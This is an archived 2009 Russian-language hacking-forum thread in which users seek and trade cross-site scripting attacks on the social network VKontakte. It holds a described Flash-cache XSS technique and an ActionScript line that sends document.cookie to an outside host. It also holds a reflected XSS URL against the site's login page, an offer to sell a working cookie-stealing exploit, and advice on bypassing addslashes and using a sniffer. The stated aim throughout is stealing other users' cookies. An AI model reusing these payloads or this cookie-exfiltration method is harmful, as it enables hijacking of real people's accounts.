Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Социальные сети (https://forum.antichat.xyz/forumdisplay.php?f=133)
-   -   xss VKONTAKTE (https://forum.antichat.xyz/showthread.php?t=100257)

Ylka 08.01.2009 23:43

xss VKONTAKTE
 
На многих форумах и сайтах я встричал ето :

В популярной социальной сети ВКонтакте.ру, в сервисе Приложения обнаружена XSS-уязвимость.

Она заключается в том, что в исходный код флэшки можно внедрить javascript, который при прямом доступе к флэшке исполнится, как и в IE, так и в Firefox'е. Это, конечно, разработчиками ВКонтакте учтено: прямой доступ к флэшке запрещен. Но флэшка сохраняется в кэше браузера, откуда ее можно загрузить без проблем.

Когда флэшка сохранилась в кэше браузера, то она может открыть новое окно с ссылкой на себя, браузер ее загрузит из кэша - и javascript выполнится.

Единственное, что спасает, - это блокировщик всплывающих окон. Но обычные пользователи, видя, что открывает его ВКонтакт, блокировку снимут. Работоспособность во всех браузерах не гарантирована, проверялось на IE6 и FF3RC1


Как ето здєлать ???
Помогите написать FLASH

iddqd 08.01.2009 23:48

давно уже неактуально :(

Ylka 08.01.2009 23:56

Ну и что всеодно очень нужно помогите

Zitt 09.01.2009 02:58

возми любой учеьник по флеш....

Ylka 09.01.2009 12:41

Как можна взять льбую FLASH і впихнути в ее JAVA которий будєт потом виполнят скрипт і которий будєт входити на сайт фейк І подскажите што нада туда впихнути

Ylka 10.01.2009 01:36

В популярной социальной сети ВКонтакте.ру, в сервисе Приложения обнаружена XSS-уязвимость.

Она заключается в том, что в исходный код флэшки можно внедрить javascript, который при прямом доступе к флэшке исполнится, как и в IE, так и в Firefox'е. Это, конечно, разработчиками ВКонтакте учтено: прямой доступ к флэшке запрещен. Но флэшка сохраняется в кэше браузера, откуда ее можно загрузить без проблем.

Когда флэшка сохранилась в кэше браузера, то она может открыть новое окно с ссылкой на себя, браузер ее загрузит из кэша - и javascript выполнится.

Единственное, что спасает, - это блокировщик всплывающих окон. Но обычные пользователи, видя, что открывает его ВКонтакт, блокировку снимут. Работоспособность во всех браузерах не гарантирована, проверялось на IE6 и FF3RC1

Пример атаки:

http://vkontakte.ru/apps.php?act=s&id=15… (новое окно открывается через 2 секунды)




Как ето здєлать ?????

vitalikis 15.01.2009 23:18

подскажите нормальную пасивку вк, а то ту что в фильтре друзей и редактирование аудио\заметок и т.д. нормально не заюзаеш

Executor-666 15.01.2009 23:23

эх были такие милые приложения,которые автоматически создавали группы.

vitalikis 16.01.2009 00:04

а толку? в названиях группы всё фильтруется

Executor-666 16.01.2009 00:19

Цитата:

Сообщение от vitalikis
а толку? в названиях группы всё фильтруется

мне бы найти эту программку,что бы группы регить,а потом просматривать номера групп,сечешь тему)

vitalikis 16.01.2009 00:34

Цитата:

сечешь тему
толкать красивые ид? помоему тема не совсем актуальна...

Executor-666 16.01.2009 02:01

ну ,хз,кому то может быть и актуальна

Ylka 16.01.2009 14:23

Мне етот способ актуален
Подскажити он счас работает вконтакте ????

vitalikis 17.01.2009 00:49

Цитата:

Подскажити он счас работает вконтакте ????
Не актуален, по крайней мере там теперь есть параметер hash=, ну думаю придумать при большом желании что то можно

З.Ы. тема про xss....

Ylka 17.01.2009 13:29

Цитата:

Сообщение от vitalikis
Не актуален, по крайней мере там теперь есть параметер hash=, ну думаю придумать при большом желании что то можно

З.Ы. тема про xss....


Например што ???

vitalikis 17.01.2009 16:29

например скрипт кторый бы эмулировал нажатие кнопки, но это не кому не нужно

Давайте лучше по теме

IDW 17.01.2009 17:19

сделай во флэше красивую кнопку Play, на ней замути что-то типа

Код:

getURL("http://rulix.h18.ru/?+document.cookie");

Ylka 17.01.2009 18:09

Цитата:

Сообщение от IDW
сделай во флэше красивую кнопку Play, на ней замути что-то типа

Код:

getURL("http://rulix.h18.ru/?+document.cookie");


На снифер или на што ???

Carbonm 08.04.2009 16:21

могу продать пассивку 50$. работает 100%! (уже cookies воровал) ICQ семь 7 шесть 33600

t3cHn0iD 08.04.2009 19:59

http://vkontakte.ru/login.php?u=1&to=>"><script>alert(/t3cHn0iD/)</script> - нате вам пассивку

Whirt 08.04.2009 20:01

t3cHn0iD , респект , если сам нашел. работает)) правда скоро прикроют)

t3cHn0iD 08.04.2009 20:36

Есть и другие варианты (но о них попозже =)))

Ylka 09.04.2009 19:01

Цитата:

Сообщение от t3cHn0iD
http://vkontakte.ru/login.php?u=1&to=>"><script>alert(/t3cHn0iD/)</script> - нате вам пассивку

А што вона делает. Нею как то можно воспользоватса. Для кражи куков или ищо штото. ?

wildshaman 09.04.2009 19:03

Цитата:

Сообщение от Ylka
А што вона делает. Нею как то можно воспользоватса. Для кражи куков или ищо штото. ?

с ее помощью можно уроки выучить =\

Carbonm 09.04.2009 23:22

можно

IcEnd 09.04.2009 23:43

Цитата:

Сообщение от Carbonm
можно

Каким способом?

Carbonm 10.04.2009 09:11

нужно написать javascript, который обходит addslashes() , а потом написать или скачать сниффер.

offline 10.04.2009 18:15

про adslashes можно пополробнее )

иддкд 10.04.2009 20:03

и да, какбе пофиксено!

offline 10.04.2009 20:33

млин (( даже не наигрался

Ylka 10.04.2009 22:33

Уже все(

dvion 11.04.2009 01:18

Сначала '+' зареплейсили (с самого начала воркало, вроде), я даже офигел от оперативности тамошних ботанов )
Потом опять фиксанул, нормально - проработало дольше, чем думалось)

getcouz 11.04.2009 01:35

быстро...0_0


Время: 04:42